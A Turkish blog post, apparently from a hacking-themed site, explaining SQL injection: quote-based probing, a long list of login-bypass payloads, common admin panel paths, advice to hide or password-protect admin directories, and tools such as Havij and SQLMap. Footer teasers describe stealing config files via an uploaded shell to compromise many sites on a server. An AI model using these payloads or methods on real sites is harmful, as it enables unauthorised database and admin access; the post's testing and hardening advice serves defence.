SQL Injection Nedir? Bilgi Güvenliği İçin Test Araçları

-

SQL Injection Nedir?




Web uygulamalarında bir çok işlem için kullanıcıdan alınan veri ile dinamik SQL cümlecikleri oluşturulur. Mesela "SELECT * FROM Urunler" örnek SQL cümleciği basit şekilde veri tabanından web uygulamasına tüm ürün bilgilerini getirecektir. Bu SQL cümlecikleri oluşturulurken araya sıkıştırılan herhangi bir meta-karakter SQL Injection'a sebep olabilir. SQL için kritik meta karakter (') tek tırnaktır. Çünkü iki tek tırnağın arası string olarak algılanır. Diğer bir önemli meta-karakter ise (;) noktalı virgüldür, satırın bittiğini ve yeni satır başladığını bildirir.
Manuel olarak ise tek tırnak meta karakterini tarayıcı (Browser) üzerinde şu şekilde deneyebiliriz;
domain.com/urunler.aspx?id=20 bu isteğin sonuna (') tek tırnak konur. urunler.aspx?id=20' daha sonra site tarafından bir SQL hatası alınırsa SQL Injection yapılabileceğini göstermektedir zafiyet.

Login Bypass Testi

SQL Injection Saldırısının en basit ve kendi sitenizde de deneyebileceğiniz yöntem olan Login Bypass, Kullanıcı adı ve Şifre kısmına Bypass edici meta kodlarını yazarak panele giriş yapabilmeyi göstereceğim. Bu saldırıyı deneme yanılma yolu ile yapabilirsiniz aşağıdaki kodları kullanarak.
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--
Birçok sitenin yönetim paneli giriş sayfası standarttır. Bunları çoğu aşağıda vereceğim dizin veya dosya uzantısı şeklinde inceleyebilirsiniz. Bunlardan kaçının ve yönetim paneline giriş dosya isminizi mutlaka bilinmeyecek şekilde değiştirin.
Örnek olarak mesela bir sitenin yönetim paneli domain.com/admin/login.asp olsun. Eğer dosya veya dizin isimlerini değiştirme gibi bir şansınız yoksa. Yönetim dizini yani örnekteki gibi admin klasörüne cPanel, Plesk, MaestroPanel gibi Web yönetim panelinde bu dizinlere ön şifreleme koymanızı öneririm. Bu paneller dışında özellikle Linux Hosting alt yapısı kullanan siteler Htaccess dosyası ile de ön şifreleme paneli oluşturabilir.



 Bunu yapmamızın sebebi Hacker tarafından veritabanı yönetim bilgileri çekilse bile yönetim panelinden giriş yapamayacak olmasıdır. Tabi diğer bilgilerin çekilmemesi için sitedeki SQL açığını kapatmak zorundasınız./admin/admin/login.asp/yonetim/yonetim/giris.php/panel/kontrolpanel/administrator/giris/login/superadmin/controlpanel/yonetici/sitepanel

Bilgi Güvenliği için Test Araçları

Bilgi güvenliğiniz için SQL Injection açıklarını kendi sitenizde aşağıdaki araçları kullanarak arayabilir ve test edebilirsiniz. Bu sayede hangi sayfada yazılımsal açık var onu bularak müdahale edebilirsiniz. Aynı zamanda aşağıdaki araçlar ile sadece SQL değil Web siteniz üzerindeki diğer zafiyetleri taramak içinde kullanabilirsiniz.


 1- Acunetix Web Vulnerability Scannerİlgili web sitelerden indirme yaparak belirli süreli deneme versiyonları ile sitenizdeki hem SQL açıklarını hemde diğer zafiyetleri tarayarak görebilirsiniz.


2- HavijSQL açığı bulduğunuz veya şüphelendiğiniz sayfayı detaylı olarak incelemek için kullanabileceğiniz bir yazılım bularak ki bunlar internette çoktur. Bulduğunuz zafiyet üzerinden sitenin Tablo ve Sütunlarını öğrenmenizi sağlar.

3- jSQL InjectionJava ile yazılmış Havij benzeri SQL Injection test yazılımları uygulamayı çalıştırmak için bilgisayarda JAVA ve Java Geliştirme Paketi (JDK) kurulu olması gerekir. Yine bunun için internette gerekli programlar yazılımlar mevcut oradan edinilerek kullanabilrisiniz

4- SQLMap
Python dilinde yazılmış SQL hatalarını bulmaya yarayan bir güvenlik yazılımıdır. Yazılımı bir Linux dağıtımı üzerinde kullanmanızı öneririm çünkü işlemleri Terminal üzerinde yapıyorsunuz. Tabi isteyenler Windows'a Python yükleterek de çalışabilir. Manüel olarak çalışacağınız için Basic SQL kod bilgisine ihtiyacınız vardır. Havij gibi kullanımı basit değildir.

Yorumlar

Yorum Gönder

Bu blogdaki popüler yayınlar

Site Hackleme Taktikleri Ve Açıklamalar

-
Resim
Site Hackleme Taktikleri ve Açıklamalar Brute Force Attacks Site Hackleme Taktikleri Ve Açıklamalar Belirli tabanlı sitelere yapılan deneme yanılma saldırılarıdır. Tam olarak bir açık değildir. Şifrelerin zayıf,kolay olması ile işe yarayan bir yöntemdir. Özel siteleri hacklerken pek fazla kullanılmaması ile beraber sayı kasmak için yapılan saldırlarda etkili bir yöntemdir.  SQL İnjection SQL İnjection sql veritabanı kullanan site ve uygulamalarda oluşan bir açıktır. Saldırganın sitede (ya da uygulamada) izinsiz şekilde sql komutları çalıştırmasına olanak sağlar. Bu şekilde etkili kullanıldığı takdirde tüm veritabanı bilgilerine erişim sağlanabilir. Dilerseniz vikipedi tanımna bakalım, daha açıklayıcı olacaktır : SQL Injection , veri tabanına dayalı uygulamalara saldırmak için kullanılan bir atak tekniğidir; burada saldırgan SQL dili özelliklerinden faydalanarak standart uygulama ekranındaki ilgili alana yeni SQL ifadelerini ekler. (Örneğin saldırgan,veritabanı içeriğini ...
Devamı

CONFİG NEDİR? Ne İşimize Yarıyacak? Config Çekme Örnekleri. - Hackerlik Okulu

-
Resim
CONFİG NEDİR? Config sitenin bilgilerinin bulunduğu ve diğer sitelerin serwerlarıyla iletişimin sağlandığı dosyadır.Tam adı config.php (wordpress) ya da configuration.php 'dir ( joomla ). Ne İşimize Yarıyacak? Evet,gelelim asıl mevzuya ne işe yarıyacağına.Biz config dosyasından db adını,db şifresini ve db kullanıcı adını alarak bi de port değişikse onu da configten öğrenerek shellin sql bölümünden kendi sitemize bağlanabiliriz. Ee diyorsunuz zaten shell attığım bir siteye bağlansam ne olacak? Zaten amaç bu değil; asıl amaç config dosyasının içindeki bilgileri çekmek. Sizin görebildiğiniz kendi sitenizin bilgileri, fakat birkaç işlemle config çekebilirsek sunucuda bulunan bütün sitelerin config.phpsine ulaşabiliriz. Bu da şu demek oluyor,1 siteyle 100'lerce, 1000'lerce site hackleyebiliriz. İşte shellin sql bölümünden sitelere bağlanabiliriz, ve şifrelerini değiştirip hepsini hackliyebiliriz. Config dosyasının işlevi bu. Çekildikten sonra db adı,portu,şifresi...
Devamı

Profesyonel Hacker Olmak İsteyenler Yeni Başlayanlar İçin Yol Haritası

-
Resim
Profesyonel Hacker Olmak İsteyenler Yeni Başlayanlar İçin Yol Haritası Beyaz Şapkalı Hacker olmak istiyorum diyenlere Hackerlerin amacı nedir ? Böyle bir soru soruldugu zaman hiç bir hacker ben hacker olucam diye yola çıkmaz. Zamanla bilgi ve birikimi onu hacker olmaya itmiştir. Artık geri dönulmez bir yola girdigini anlamıştır. Kendine bir amaç çizer. Bunlar gunumuzde genelde , İllegal hosuna gitmeyen siteleri hacklamak , Sistem açıklarını tespit edip O sisteme sızarak sistemin guvenlı olmadıgını belirtmek en buyuk zevkleri arasındadır. Hackerler biraz da egoist olurlar. Kimileri her ne kadar Hackerler tanınmaz , En iyi hacker kendini gizleyen hacker vb gibi laflar desede , bu laflar çoluk , çocuk laflarıdır. Bir hacker Sisteme girdiginde mutlaka kendini gizler , kendini tespit ettirecek şeylerden uzak durur. Fakat Hack Dünyası nda ismini duyurmak mutlaka o da isteyecek ve tanınmak isteyecektir. Fakat Gerçek bir hacker bir iş yaptıgı zaman tam yapar , öz yapar .. Yaptıgı iş d...
Devamı